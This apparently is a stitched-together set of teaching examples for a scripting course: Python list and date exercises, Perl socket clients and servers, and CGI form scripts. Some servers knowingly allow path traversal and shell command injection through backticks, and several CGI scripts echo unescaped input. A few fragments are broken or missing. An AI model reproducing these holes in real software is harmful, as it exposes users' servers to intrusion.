def print_odd0(list):
    for element in list:
        if element % 2 :
            print(element)

# list comprehension
def print_odd1(list):
    odd = [x for x in list if x % 2]
    for element in odd:
        print(element)

def odd(x):
    return x % 2

# filter+helper function
def print_odd2(list):
    for element in filter(odd, list):
        print(element)

# filter+lambda expression
def print_odd3(list):
    for element in [x for x in list if x % 2]:
        print(element)

# join+map+filter+helper function
def print_odd4(list):
    print("\n".join(map(str, filter(odd, list))))

a = list(range(1, 10))
for version in range(0, 5):
    print("print_odd%s"%version)
    eval("print_odd%s(a)"%version)

Reads lines of input until end-of-input

Print snap! if two consecutive lines are identical

import sys
sys.stdout.write("Enter line: ")
sys.stdout.flush()
last_line = sys.stdin.readline()
while 1:
    sys.stdout.write("Enter line: ")
    sys.stdout.flush()
    line = sys.stdin.readline()
    if not line:
        break
    if line == last_line:
        print("Snap!")
    last_line = line

import re
from random import randint

def random_date():
    return "%02d/%02d/%04d"%(randint(1,28), randint(1,12), randint(2000,2020))

def parse_date(date1):
    (day, month, year) = re.split(r'\D+', date1)
    return (year, month, day)

random_dates = [random_date() for x in range(0,5)]
print("random_dates: " + ','.join(random_dates))
sorted_dates = sorted(random_dates, key=parse_date)
print("sorted dates: " + ','.join(sorted_dates))

import random

days = {'Sunday':0, 'Monday':1, 'Tuesday':2, 'Wednesday':3,
         'Thursday':4, 'Friday':5, 'Saturday':6}

def random_day():
    return str(random.choice(list(days.keys())))

def day_number(day):
    return days[day]

random_days = [random_day() for x in range(0,5)]
print("random_days = " + ','.join(random_days))

sorted_days = sorted(random_days, key=day_number)
print("sorted_days = " + ','.join(sorted_days))

import random

day_names = "Sunday Monday Tuesday Wednesday Thursday Friday Saturday"
days = dict(list(zip(day_names.split(), list(range(0,7)))))

random_days = [random.choice(list(days.keys())) for x in range(0,5)]
print("random_days = " + ','.join(random_days))

sorted_days = sorted(random_days, key=lambda x:days[x])
print("sorted_days = " + ','.join(sorted_days))

Web:lecture slideslecture notes


simple Perl TCP/IP server access by telnet localhost 4242

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 4242, Listen => SOMAXCONN) or die;

while ($c = $server->accept()) {
    printf STDERR "[Connection from %s]\n", $c->peerhost;
    print $c scalar localtime,"\n";
    close $c;
}

simple Perl TCP/IP client

use IO::Socket;
$server_host =  $ARGV[0] || 'localhost';
$server_port = 4242;
$c = IO::Socket::INET->new(PeerAddr => $server_host, PeerPort  => $server_port) or die;
$time = <$c>;
close $c;
print "Time is $time\n";

fetch files via http from the webserver at the specified URL see HTTP::Request::Common for a more general solution

use IO::Socket;
foreach $url (@ARGV) {
    $url =~ /http:\/\/([^\/]+)(:(\d+))?(.*)/ or die;
    $c = IO::Socket::INET->new(PeerAddr => $1, PeerPort => $2 || 80) or die;
    # send request for web page to server
    print $c "GET $4 HTTP/1.0\n\n";
    # read what the server returns
    my @webpage = <$c>;
    close $c;
    print "GET $url =>\n", @webpage, "\n";
}

list to port 2041 for incoming connections print then details to stdout then send back a 404 status code

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    printf "HTTP request from %s =>\n\n", $c->peerhost;
    while ($request_line = <$c>) {
        print "$request_line";
        last if $request_line !~ /\S/;
    }
    print $c "HTTP/1.0 404 This webserver always returns a 404 status code\n";
    close $c;
}

list to port 2041 for incoming connections print then details to stdout then send back a 404 status code

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this web server at http://localhost:2041/\n\n";

$content = "Everything is OK - you will pass COMP[29]041.\n";

while ($c = $server->accept()) {
    printf "HTTP request from %s =>\n\n", $c->peerhost;
    while ($request_line = <$c>) {
        print "$request_line";
        last if $request_line !~ /\S/;
    }
    
    # print header
    print $c "HTTP/1.0 200 OK\n";
    print $c "Content-Type: text/plain\n";
    printf $c "Content-Length: %d\n\n", length($content);

    print $c $content;
    close $c;
}

return files in response to incoming http requests to port 2041 note does not check the request is well-formed or that the file exists also very insecure as pathname may contain ..

use IO::Socket;

print "Access this server at http://localhost:2041/\n\n";

while (1) {
    $server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;
    while ($c = $server->accept()) {
        my $request = <$c>;
        print "Connection from ", $c->peerhost, ": $request";
        $request =~ /^GET (.+) HTTP\/1.[01]\s*$/;
        print "Sending back /home/cs2041/public_html/$1\n";
        open my $f, '<',"/home/cs2041/public_html/$1";
        $content = join "", <$f>;
        close $f;
        print $c "HTTP/1.0 200 OK\n";
        print $c "Content-Type: text/html\n";
        printf $c "Content-Length: %d\n\n", length($content);
        print $c $content;
        close $c;
    }
}

return files in response to incoming http requests to port 2041, determine appropriate mime type using /etc/mime.types

use IO::Socket;

print "Access this server at http://localhost:2041/\n\n";

open my $mt, '<', "/etc/mime.types" or die "Can not open /etc/mime.types: $!\n";
while ($line = <$mt>) {
    $line =~ s/#.*//;
    my ($mime_type, @extensions) = split /\s+/, $line;
    foreach $extension (@extensions) {
        $mime_type{$extension} = $mime_type;
    }
}
close $mt;
while (1) {
    $server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;
    while ($c = $server->accept()) {
        print "waiting for connection";
        my $request = <$c>;
        last if !$request;
        printf "Connection from %s, request: $request", $c->peerhost;
        my $content_type = "text/plain";
        my $status_line = "400 BAD REQUEST";
        my $content = "";

        if (my ($url) = $request =~ /^GET (.+) HTTP\/1.[01]\s*$/) {
            # remove any occurences of .. from pathname to prevent access outside 2041 directory
            $url =~ s/(^|\/)\.\.(\/|$)//g;
            my $file = "/home/cs2041/public_html/$url";
            $file .= "/index.html" if -d $file;

            print "$file requested\n";
            if (open my $f, '<', $file) {
                my ($extension) = $file =~ /\.(\w+)$/;
                $status_line = "200 OK";
                $content_type = $mime_type{$extension} if $extension && $mime_type{$extension};
                $content = join "", <$f>;
            } else {
                $status_line = "404 FILE NOT FOUND";
                $content = "File $file not found\n";
            }
        }

        my $header = sprintf "HTTP/1.0 $status_line\nContent-Type: $content_type\nContent-Length: %d\n\n", length($content);
        print "Sending this header:\n", $header;

        print $c $header, $content;;
        close $c;
    }
}

use IO::Socket;
foreach (@ARGV) {
    $url =~ /http:\/\/([^\/]+)(:(\d+))?(.*)/ or die;
    $c = IO::Socket::INET->new(PeerAddr => $1, PeerPort => $2 || 80) or die;
    # send request for web page to server
    sleep 3600;
    print $c "GET $4 HTTP/1.0\n\n";
    # read what the server returns
    my @webpage = <$c>;
    close $c;
    print "GET $url =>\n", @webpage, "\n";
}

return files in response to incoming http requests to port 2041 access by http://localhost:2041/ this version handles incoming request in a child process

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    if (fork() != 0) {
        # parent process goes to waiting for next request
        close($c);
        next;
    }
    # child processes request
    my $request = <$c>;
    printf "Connection from %s, request: $request", $c->peerhost;
    if (my ($url) = $request =~ /^GET (.+) HTTP\/1.[01]\s*$/) {
        # remove any occurences of .. from pathname to prevent access outside 2041 directory
        $url =~ s/(^|\/)\.\.(\/|$)//g;
        my $file = "/home/cs2041/public_html/$url";
        $file .= "/index.html" if -d $file;
        if (open my $f, '<', $file) {
            print $c "HTTP/1.0 200 OK\nContent-Type: text/html\n\n", <$f>;
        } else {
            print $c "HTTP/1.0 404 FILE NOT FOUND\nContent-Type: text/plain\n\nFile $file not found\n";
        }
    } else {
        print $c "HTTP/1.0 400 BAD REQUEST\nContent-Type: text/plain\n\nBAD REQUEST\n";
    }
    close $c;
    # child must terminate here otherwise it would compete with parent for requests
    exit 0;
}

return files in response to incoming http requests files with suffix .cgi executed and output returned only GET method supported assumes application/x-www-form-urlencoded data so CGI.pm won't work

See http://search.cpan.org/dist/HTTP-Server-Simple/ for a much more general solution

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    my $request = <$c>;
    if ($request =~ /^GET (.+) HTTP\/1.[01]\s*$/) {
        my $url = $1;
        $url =~ s/(^|\/)\.\.(\/|$)//g;
        if ($url =~ /^(.*\.cgi)(\?(.*))?$/) {
            my $cgi_script = "/home/cs2041/public_html/$1";
            $ENV{SCRIPT_URI} = $1;
            $ENV{QUERY_STRING} = $3 || '';
            $ENV{REQUEST_METHOD} = "GET";
            $ENV{REQUEST_URI} = $url;
            print $c "HTTP/1.0 200 OK\n";
            print $c `$cgi_script` if -x $cgi_script;
        } else {
            my $file = "/home/cs2041/public_html/$url";
            $file .= "/index.html" if -d $file;
            if (!-e $file) {
                print $c "HTTP/1.0 404 FILE NOT FOUND\nContent-Type: text/plain\n\nFile $file not found\n";
            } else {
                print $c "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
                open my $f, '<', $file or next;
                print $c (<$f>);
                close $f;
            }
        }
    } else {
        print $c "HTTP/1.0 400 BAD REQUEST\nContent-Type: text/plain\n\nBAD REQUEST\n";
    }
    close $c;
}

return files in response to incoming http requests files with suffix .cgi executed and output returned

GET & POST requests handled assumes application/x-www-form-urlencoded data so CGI.pm won't work

See http://search.cpan.org/dist/HTTP-Server-Simple/ for a much more general solution

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    my $request = <$c>;
    printf "Connection from %s, request: $request", $c->peerhost;
    my $content_length = 0;
    while (<$c>) {
        print;
        $header_field{$1} = $2 if /(\S+):\s*(.*)/;
        last if /^\s*$/;
    }
    if ($request =~ /^(GET|POST) (.+) HTTP\/1.[01]\s*$/) {
        my $method = $1;
        my $url = $2;
        $url =~ s/(^|\/)\.\.(\/|$)//g;
        if ($url =~ /^(.*\.cgi)(\?(.*))?$/) {
            my $cgi_script = "/home/cs2041/public_html/$1";
            my $parameters = '';
            if ($method eq 'GET') {
                $parameters = $3 if $3;
            } else {
                read($c, $parameters, $header_field{'Content-Length'});
            }
            print $c "HTTP/1.0 200 OK\n";
            print "Running: echo '$parameters'|$cgi_script\n";
            # provide a minimal set of environment variables
            %ENV = (CONTENT_LENGTH => length $parameters,
                    CONTENT_TYPE => 'application/x-www-form-urlencoded',
                    REQUEST_METHOD => $method,
                    REQUEST_URI => $url,
                    SCRIPT_NAME => $cgi_script);
            # obvious security hole here from shell meta-characters in parameters
            print $c `echo '$parameters'|$cgi_script`;
        } else {
            my $file = "/home/cs2041/public_html/$url";
            $file .= "/index.html" if -d $file;
            if (!-e $file) {
                print $c "HTTP/1.0 404 FILE NOT FOUND\nContent-Type: text/plain\n\nFile $file not found\n";
            } else {
                print $c "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
                open my $f, '<', $file or die;
                print $c (<$f>);
                close $f;
            }
        }
    } else {
        print $c "HTTP/1.0 400 BAD REQUEST\nContent-Type: text/plain\n\nBAD REQUEST\n";
    }
    close $c;
}

<!DOCTYPE html>
<html lang="en">
<head>
<title>Command</title>
</head>
<body>
<input type=text id="x" onkeyup="sum();"> +
<input type=text id="y" onkeyup="sum();"> =
<input type=text id="sum" readonly="readonly">
<script type="text/javascript">
function sum() {
    var x = parseInt(document.getElementById('x').value) || 0;
    var y = parseInt(document.getElementById('y').value) || 0;
    document.getElementById('sum').value = x + y;
}
</script>
</body>
</html>

<html>
<head>
<title>Command</title>
</head>
<body>
<button id="match">Match</button> regular expression <input type=text id=regex>
<br>
against string <input type=text id=string>
<div id="show"></div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(
    function() {
        $("#match").click(
            function() {
                $.get(
                    "match.cgi",
                    {string:$("#string").val(), regex:$("#regex").val()},
                    function(data) {
                        $("#show").html(data)
                    }
                )
            }
        )
    }
)
</script>
</body>
</html>

See match.html

use CGI qw/:all/;
print header;
if (param('string') =~ param('regex')) {
    print b('Match succeeded, this substring matched: ');
    print tt(escapeHTML($&));
} else {
    print b('Match failed');
}

use Storable;
$cache_file = "./.cache";
%h = %{retrieve($cache_file)} if -r $cache_file;
$h{COUNT}++;
print "This script has now been run $h{COUNT} times\n";
store(\%h, $cache_file);

fetch files via http from the webserver at the specified URL with a simple cookie implementation (no expiry) see HTTP::Request::Common for a more general solution
use Storable;

$cookies_db = "./.cookies";
%cookies = %{retrieve($cookies_db)} if -r $cookies_db;

use IO::Socket;
use IO::Socket::SSL;

foreach (@ARGV) {
    my ($protocol, $host, $port, $path) = /(https?):\/\/([^\/:]+)(?::(\d+))?(.*)/ or die;
    if ($protocol eq "http") {
        $c = IO::Socket::INET->new(PeerAddr => $host, PeerPort  => $port || 80) or die;
    } else {
        $c = IO::Socket::SSL->new(PeerAddr => $host, PeerPort  => $port || 443) or die;
    }
    print $c "GET $path HTTP/1.0\n";
    foreach $domain (keys %cookies) {
        next if $host !~ /$domain$/;
        foreach $cookie_path (keys %{$cookies{$domain}}) {
            next if $path !~ /^$cookie_path/;
            foreach $name (keys %{$cookies{$domain}{$path}}) {
                print $c "Cookie: $name=$cookies{$domain}{$path}{$name}\n";
                print STDERR "Sent cookie $name=$cookies{$domain}{$path}{$name}\n";
            }
        }
    }
    print $c "\n";
    while (<$c>) {
        last if /^\s*$/;
        next if !/^Set-Cookie:/i;
        my ($name,$value, %v) = /([^=;\s]+)=([^=;\s]+)/g;
        my $domain = $v{'domain'} || $host;
        my $path = $v{'path'} || $path;
        $cookies{$domain}{$path}{$name} = $value;
        print STDERR "Received cookie $domain $path $name=$value\n";
    }
    my @webpage = <$c>;
    print STDOUT @webpage;
}

store(\%cookies, $cookies_db);

retrieved value stored for x in cookie if there is one increment and set the cookie to this value

$x = 0;
if (defined $ENV{HTTP_COOKIE} && $ENV{HTTP_COOKIE} =~ /\bx=(\d+)/) {
    $x = $1 + 1;
}
print "Content-type: text/html
Set-Cookie: x=$x;

<html><head></head><body>
x=$x
</body></html>";

retrieves value stored for x in cookie if there is one increment and set the cookie to this value

use CGI qw/:all/;
use CGI::Cookie;

%cookies = fetch CGI::Cookie;
$x = 0;
$x = $cookies{'x'}->value if $cookies{'x'};
$x++;
print header(-cookie=>"x=$x"), start_html('Cookie Example'), "x=$x", end_html;

CGI:lecture slideslecture notes Cgi Examples
External resources:
CGI.pm tutorial


Output some simple HTML

echo 'Content-type: text/html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Hello World</title>
  </head>
  <body>
    Hello World
  </body>
</html>'

Output some simple HTML

print 'Content-type: text/html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Hello World</title>
  </head>
  <body>
    Hello World
  </body>
</html>
';

Output some simple HTML

use CGI qw/:all/;

print header,
      start_html('Hello World'),
      h2('Hello World'),
      end_html;

Print some HTML plus information about the environment in which the CGI script has been run

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Execution Environment</h2>
<pre>
eof

for command in pwd id hostname 'uname -a'
do
    echo "$command: `$command`"
done

cat <<eof
</pre>
</body>
</html>
eof


Print some HTML plus information about the environment in which the CGI script has been run

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Execution Environment</h2>
<pre>
";

for $command ("pwd","id","hostname","uname -a") {
    print " $command: ",` $command`;
}

print "
</pre>
</body>
</html>
";


Print some HTML plus the environment passed to CGI script by the web server

Note a < character in environment variable values will be interpreted as a HTML tag

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Environment Variables</h2>
<pre>
`env`
</pre>
</body>
</html>
eof


Print some HTML plus the environment passed to CGI script by the web server

Note a < character in environment variable values will be interpreted as a HTML tag

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Environment Variables</h2>
<pre>
";

system "env";

print "
</pre>
</body>
</html>
";


<html>
<head>
<title>An Example Form</title>
</head><body><h1>A Simple Example</h1>
<form method="post" action="show_input_parameters.cgi">
What's your name?
<input type="text" name="name">
<p>
What's the combination?
<p>
<input type="checkbox" name="words" value="eenie" checked="checked">eenie
<input type="checkbox" name="words" value="meenie">meenie
<input type="checkbox" name="words" value="minie" checked="checked">minie
<input type="checkbox" name="words" value="moe">moe
<p>
What's your favorite colour?
<select name="colour">
<option value="red">red</option>
<option value="green">green</option>
<option value="blue">blue</option>
<option value="chartreuse">chartreuse</option>
</select>
<p>
<input type=hidden name="user" value="andrewt">
<input type=hidden name="password" value="secret">
<input type="submit" name="answer">
</form>
</body>
</html>

Output some simple HTML and the input parameters the web server has passed on to the CGI script.

Only works for the POST method which passes parameters on STDIN

cat <<eof
Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<pre>
`cat`
</pre>
</body>
</html>
eof



Output some simple HTML and the input parameters the web server has passed on to the CGI script.

Only works for the POST method which passes parameters on STDIN

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<hr>
<pre>
";

print <>;

print "
</pre>
<hr>
</body>
</html>
";


Output some simple HTML and the input parameters the web server has passed on to the CGI script.

Only works for the GET method which passes parameters on STDIN

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Input Parameters</h2>
<pre>
$QUERY_STRING
</pre>
</body>
</html>
eof



Output some simple HTML and the input parameters the web server has passed on to the CGI script.

Only works for the POST method which passes parameters on STDIN

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<hr>
<pre>
$ENV{QUERY_STRING}
</pre>
<hr>
</body>
</html>
";


Output some simple HTML and the input parameters the web server has passed on to the CGI script.

if test "$REQUEST_METHOD" = POST
then
    parameters="`cat`"
else
    parameters="$QUERY_STRING"
fi

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>

<h2>$REQUEST_METHOD Request - Input Parameters</h2>
<pre>
$parameters
</pre>
</body>
</html>
eof



Output some simple HTML and the input parameters the web server has passed on to the CGI script.

if ($ENV{REQUEST_METHOD} eq 'POST') {
    $parameters = <>;
} else {
    $parameters = $ENV{QUERY_STRING}
}

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<hr>
<pre>
$parameters
</pre>
<hr>
</body>
</html>
";


<html>
<head>
<title>An Example Form</title>
</head><body><h1>A Simple Example</h1>
<form method="post" action="show_input_parameters_table.cgi">
What's your name?
<input type="text" name="name">
<p>
What's the combination?
<p>
<input type="checkbox" name="words" value="eenie" checked="checked">eenie
<input type="checkbox" name="words" value="meenie">meenie
<input type="checkbox" name="words" value="minie" checked="checked">minie
<input type="checkbox" name="words" value="moe">moe
<p>
What's your favorite colour?
<select name="colour">
<option value="red">red</option>
<option value="green">green</option>
<option value="blue">blue</option>
<option value="chartreuse">chartreuse</option>
</select>
<p>
<input type=hidden name="user" value="andrewt">
<input type=hidden name="password" value="secret">
<input type="submit" name="answer">
</form>
</body>
</html>

Output some simple HTML and a table of the input parameters the web server has passed on to the CGI script.

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<hr>
<table border=1>
";

if ($ENV{REQUEST_METHOD} eq 'POST') {
    $parameters = <>;
} else {
    $parameters = $ENV{QUERY_STRING}
}

foreach (split(/\&/, $parameters)) {
    /([^=]*)=(.*)/;
    print "<tr><td>$1<td>$2\n";
}

print "
</table>
<hr>
</body>
</html>
";


Output some simple HTML and a table of the data has passed to the CGI script.

use CGI qw/:all/;

print header,
      start_html('Input Parameters'),
      h2('Input Parameters'),
      "<table border=1>";
foreach $p (param()) {
    printf "<tr><td>%s<td>%s\n", $p, param($p);
}
print "</table>",hr,end_html;


INTERNAL ERROR MISSING FILE: "code/cgi/show_input_parameters_table.php"
INTERNAL ERROR MISSING FILE: "code/cgi/show_input_parameters_table.php"

Demonstrating use of CGI::Carp to redirect errors to browser

The warning appears as a comment in the HTML source

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Handling warnings in CGI Scripts');
warningsToBrowser(1);
warn "example warning";     # generate a warning
die "example fatal error";  # generate a fatal error
print end_html;

Outputs a form which will rerun the script

cat <<eof
Content-type: text/html

<html><head>Self replicating Form</head><body>
<form method="post" action="">
<input type="submit">
</form>
</body>
</html>
eof


Outputs a form which will rerun the script

print <<eof
Content-type: text/html

<html><head><title>Self replicating Form</title></head><body>
<form method="post" action="">
<input type="submit">
</form>
</body>
</html>
eof


Outputs a form which will rerun the script

use CGI qw/:all/;

print header,
      start_html('Self Replicating Form'),
      start_form,
      submit,
      end_form,
      end_html;


Outputs a form which will rerun the script

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Parameter');
warningsToBrowser(1);

print <<eof;
<form method="post" action="">
Enter a string: <input type="text" name="string">
</form>
<p>
eof

if (param("string")) {
    print "Last time you entered: ";
    print param("string");
}
print end_html;

Outputs a form which will rerun the script

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Parameter');
warningsToBrowser(1);

print start_form;
print 'Enter a string: ';
print textfield('string');
print end_form;

if (param("string")) {
    print "Last time you entered: ";
    print param("string");
}
print end_html;

Sum two numbers and outputs a form which will rerun the script

Note removal of characters other than 0-9 . - + to avoid potential security problems

if test $REQUEST_METHOD = "GET"
then
    parameters="$QUERY_STRING"
else
    read parameters
fi

x=`echo $parameters|sed '
    s/.*x=//
    s/&.*//
    s/[^0-9\-\.\+]//g
    '`
y=`echo $parameters|sed '
    s/.*y=//
    s/&.*//
    s/[^0-9\-\.\+]//g
    '`

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Sum Two Numbers</title>
</head>
<body>
eof

sum="?"
test "$x" -a "$y" && sum=`expr "$x" '+' "$y"`

cat <<eof

<form method="GET" action="">
<input type=textfield name=x value=$x>
+
<input type=textfield name=y value=$y>
=
$sum
<input type="submit" value="calculate">
</form>
</body>
</html>
eof


Sum two numbers and outputs a form which will rerun the script

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Sum Two Numbers');
warningsToBrowser(1);

$x = param("x");
$y = param("y");
if (defined $x && defined $y) {
    printf "%s + %s = %s\n", $x, $y, $x + $y;
}

print start_form, "\n";
print 'Enter x: ', textfield('x'), "\n";
print p;
print 'Enter y: ', textfield('y'), "\n";
print p, "\n";
print submit, "\n";
print end_form,"\n";
print end_html;

Outputs a form which will rerun the script

The value entered last time is made the initial value of the text field

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Initializing A Form');
warningsToBrowser(1);

$last_value = param("string");
if (defined $last_value) {
    print "Last time you entered: $last_value\n";
    $value = "";
} else {
    $value = "initial value";
}

print <<eof;
<form method="post" action="">
Enter a string: <input type="text" name="string" value="$value">
</form>
</html>
eof

Outputs a form which will rerun the script

The value entered last time is made the initial value of the text field

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Initializing A Form');
warningsToBrowser(1);

$last_value = param("string");
if (defined $last_value) {
    print "Last time you entered: $last_value\n";
    param("string", ""); # clear the field
} else {
    param("string", "initial value");
}

print start_form, "\n";
print "Enter a string: \n";
print textfield('string'), "\n";
print end_form, "\n";
print end_html, "\n";

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Hidden Variable');
warningsToBrowser(1);

if (defined param('x')) {
    $x = param("x") + 1;
} else {
    $x = 0;
}

printf "2**%d = %d\n", $x, 2 ** $x;

print <<eof;
<form method="post" action="">
<input type=hidden name="x" value="$x">
<input type="submit" value="Next Power of 2">
</form>
</html>
eof

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Hidden Variable');
warningsToBrowser(1);

if (defined param('x')) {
    $x = param("x") + 1;
} else {
    $x = 0;
}

param('x', $x);

printf "2**%d = %d\n", $x, 2 ** $x;
print start_form, "\n";
print hidden('x'), "\n";
print submit(value => "Next Power of 2"), "\n";
print end_form, "\n";
print end_html, "\n";

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

Two submit buttons are used to produce different actions

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Handling Multiple Submit Buttons</title>
</head>
<body>
eof
warningsToBrowser(1);

$hidden_variable = param("x") || 0;

if (defined param("increment")) {
	$hidden_variable++;
} elsif (defined param("decrement")) {
	$hidden_variable--;
}

print <<eof;
<h2>$hidden_variable</h2>
<form method="post" action="">
<input type=hidden name="x" value="$hidden_variable">
<input type="submit" name="increment" value="Increment">
<input type="submit" name="decrement" value="Decrement">
</form>
</body>
</html>
eof

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

Two submit buttons are used to produce different actions

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Handling Multiple Submit Buttons');
warningsToBrowser(1);

$hidden_variable = param("x") || 0;

if (defined param("increment")) {
	$hidden_variable++;
} elsif (defined param("decrement")) {
	$hidden_variable--;
}

param('x', $hidden_variable);
print h2($hidden_variable), "\n",
      start_form, "\n",
      hidden('x'), "\n",
      submit('increment'), "\n",
      submit('decrement'), "\n",
      end_form, "\n",
      end_html;

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Alternating State');
warningsToBrowser(1);

$x = param('state') || 0;
$x++;
param("state", $x);

print start_form, "\n";

if ($x % 2 == 0) {
    print "What's your name?\n", textfield('name');
} else {
    print "What's your height?\n", textfield('height');
}

print hidden('state'), "\n";
print end_form, "\n";
print end_html, "\n";

Create a pop menu with one entry for every file with the suffix .cgi in the current directory

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Choosing A File');
warningsToBrowser(1);

@cgi_files = glob("*.cgi");
$default = $cgi_files[rand @cgi_files]; # pick an element at random

print start_form, "\n",
    popup_menu('CGI files', \@cgi_files,  $default), "\n",
    end_form, "\n",
    end_html;

Allow users to change a file

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Editing A File');
warningsToBrowser(1);

$filename = "editfile.data";
$file_content = param('content');

if (param('Save') && defined $file_content) {
    if (open FILE, '>', $filename) {
    	print FILE $file_content;
    	close FILE;
    	print "File saved\n", end_html;
    } else {
    	print "Save failed\n", end_html;
    }
    exit 0;
}

if (!defined $file_content && open F, '<', $filename) {
	$file_content = join "", <F>;
	param('content', $file_content);
}

print   start_form, "\n",
        textarea(-name=>'content', -rows=>10,-cols=>60), "\n",
        p, submit('Save'), "\n",
        end_form, "\n",
        end_html;

Count words in a file.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Word Count</title>
</head>
<body>
eof

my $uploaded_file = param('filename');
if (defined $uploaded_file) {
    my ($lines, $words, $bytes);
    while ($line = <$uploaded_file>) {
        my @words = split /\s+/, $line;
        $words += @words;
        $bytes += length $line;
        $lines++;
    }
    printf "$uploaded_file: %d lines %d words %d bytes\n", $lines, $words, $bytes;
} 

print <<eof;
<form method="post" action="" enctype="multipart/form-data">
<input type="file" name="filename" value="Bitter.html">
<input type="submit" name="upload" value="Word Count File">
</form>
</body>
</html>
eof

Count words in text area, file or URL.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header;
print start_html('Word Count');

my $uploaded_file = param('filename');
if (defined $uploaded_file) {
    my ($lines, $words, $bytes);
    while ($line = <$uploaded_file>) {
        my @words = split /\s+/, $line;
        $words += @words;
        $bytes += length $line;
        $lines++;
    }
    printf "$uploaded_file: %d lines %d words %d bytes\n", $lines, $words, $bytes;
} 

print start_form, "\n",
      filefield('filename'),  "\n",
      submit('Word Count File'), "\n",
      end_form, "\n",
      end_html;

Count words in a file.

import cgi, cgitb, re

print """Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Word Count</title>
</head>
<body>
"""

cgitb.enable()
parameters = cgi.FieldStorage()

if 'filename' in parameters:
    uploaded_file =parameters['filename'].file
    (lines, words, bytes) = (0, 0, 0)
    for line in uploaded_file:
        words += len(re.split(r'/\s+/', line))
        bytes += len(line)
        lines += 1
    print "%s: %d lines %d words %d bytes\n" % (parameters['filename'].filename, lines, words, bytes)

print """
<form method="post" action="" enctype="multipart/form-data">
<input type="file" name="filename" value="Bitter.html">
<input type="submit" name="action" value="Word Count File">
</form>
</body>
</html>
"""

Parameters: index = index into the array of colour names

Hexcodes are often used instead of names e.g. #FF6347 instead of Tomato

use CGI ':all';

